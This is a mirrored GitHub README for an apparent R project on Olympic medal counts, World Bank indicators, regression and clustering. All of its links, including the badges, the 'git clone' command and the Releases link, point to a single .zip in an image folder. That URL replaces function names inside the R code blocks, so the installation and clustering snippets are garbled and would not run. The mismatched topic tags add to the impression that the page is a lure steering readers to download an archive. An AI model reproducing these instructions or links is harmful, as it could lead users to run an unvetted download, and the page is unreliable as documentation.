https://github.com/synth001/olympic-medal-data-analysis
🥇 A project for analyzing Olympic medal data with R, combining TidyTuesday records and World Bank indicators to assess raw medal counts, efficiency metrics, and economic context. It generates diverse visualizations, performs regression and clustering, and reveals patterns in national Olympic performance.
https://github.com/synth001/olympic-medal-data-analysis
analytics dataanalysis docker excel formula1 latex matplotlib microsoftexcel olympics olympics-medals pandas pivot-tables plotly rprogramming
Last synced: about 2 months ago
JSON representation
🥇 A project for analyzing Olympic medal data with R, combining TidyTuesday records and World Bank indicators to assess raw medal counts, efficiency metrics, and economic context. It generates diverse visualizations, performs regression and clustering, and reveals patterns in national Olympic performance.
- Host: GitHub
- URL: https://github.com/synth001/olympic-medal-data-analysis
- Owner: synth001
- License: mit
- Created: 2025-05-11T00:35:05.000Z (about 1 year ago)
- Default Branch: master
- Last Pushed: 2025-05-12T23:29:34.000Z (about 1 year ago)
- Last Synced: 2025-05-13T00:55:10.454Z (about 1 year ago)
- Topics: analytics, dataanalysis, docker, excel, formula1, latex, matplotlib, microsoftexcel, olympics, olympics-medals, pandas, pivot-tables, plotly, rprogramming
- Language: R
- Size: 683 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Olympic Medal Data Analysis 🥇
Welcome to the Olympic Medal Data Analysis project! This repository focuses on analyzing Olympic medal data using R. By combining TidyTuesday records with World Bank indicators, we assess raw medal counts, efficiency metrics, and the economic context surrounding Olympic performance.
[](https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip)
## Table of Contents
- [Introduction](#introduction)
- [Project Overview](#project-overview)
- [Data Sources](#data-sources)
- [Features](#features)
- [Getting Started](#getting-started)
- [Usage](#usage)
- [Visualizations](#visualizations)
- [Regression and Clustering](#regression-and-clustering)
- [Contributing](#contributing)
- [License](#license)
- [Acknowledgments](#acknowledgments)
## Introduction
The Olympic Games serve as a global stage for athletic excellence. This project aims to delve into the data behind these events, providing insights into how countries perform and what factors influence their success.
## Project Overview
This project integrates data from TidyTuesday and World Bank indicators to explore several key areas:
- Raw medal counts for different countries.
- Efficiency metrics that evaluate how effectively countries convert resources into medals.
- Economic context that provides background on the countries' performances.
By leveraging R's powerful data analysis capabilities, we create visualizations that reveal patterns and trends in Olympic performance over the years.
## Data Sources
The primary data sources for this project include:
- **TidyTuesday**: A weekly data project that provides datasets for analysis.
- **World Bank Indicators**: Economic data that gives context to Olympic performance.
We clean and preprocess this data to ensure it is ready for analysis.
## Features
This project includes several key features:
- **Data Cleaning**: Scripts to clean and preprocess raw data.
- **Visualizations**: A variety of charts and graphs to illustrate findings.
- **Statistical Analysis**: Regression and clustering methods to identify patterns.
- **Economic Context**: Analysis of how economic factors relate to Olympic success.
## Getting Started
To get started with this project, you need to clone the repository and install the required packages.
### Prerequisites
Make sure you have R and RStudio installed on your machine. You will also need the following R packages:
- tidyverse
- ggplot2
- dplyr
- readr
- tidyr
### Installation
Clone the repository:
```bash
git clone https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip
```
Navigate to the project directory:
```bash
cd Olympic-Medal-Data-Analysis
```
Install the required packages:
```R
https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip(c("tidyverse", "ggplot2", "dplyr", "readr", "tidyr"))
```
## Usage
Once you have installed the required packages, you can run the analysis scripts. The main script to start with is `analysis.R`. This script will load the data, perform the necessary analysis, and generate visualizations.
Run the script in RStudio:
```R
source("analysis.R")
```
This will execute the analysis and produce the visualizations in your RStudio environment.
## Visualizations
Visualizations are a critical part of this project. They help convey complex data in an understandable way. We create various types of charts, including:
- **Bar Charts**: To display the total number of medals won by each country.
- **Line Graphs**: To show trends in Olympic performance over time.
- **Heat Maps**: To visualize the efficiency of countries in converting resources to medals.
Here’s an example of a bar chart that displays the total medal counts:
```R
library(ggplot2)
ggplot(data, aes(x = country, y = total_medals)) +
geom_bar(stat = "identity") +
theme_minimal() +
labs(title = "Total Olympic Medals by Country", x = "Country", y = "Total Medals")
```
## Regression and Clustering
We apply regression analysis to understand the relationship between economic indicators and medal counts. This helps identify which factors most significantly influence Olympic success.
### Regression Analysis
We use linear regression to model the relationship between GDP and the number of medals won. The following code snippet illustrates this:
```R
model <- lm(total_medals ~ gdp_per_capita, data = data)
summary(model)
```
### Clustering Analysis
Clustering helps group countries based on similar performance metrics. We utilize k-means clustering for this purpose. Here’s how to implement it:
```R
https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip(123)
clusters <- kmeans(data[, c("total_medals", "gdp_per_capita")], centers = 3)
data$cluster <- clusters$cluster
```
## Contributing
We welcome contributions to this project. If you have suggestions or improvements, please follow these steps:
1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Make your changes and commit them.
4. Push your branch to your fork.
5. Create a pull request.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for more information.
## Acknowledgments
We thank the TidyTuesday community for providing valuable datasets. Their efforts help promote data analysis and visualization skills across various domains.
For further details and updates, visit our [Releases section](https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip).
[](https://raw.githubusercontent.com/synth001/Olympic-Medal-Data-Analysis/master/img/Medal_Data_Olympic_Analysis_v1.5-beta.4.zip)
Happy analyzing!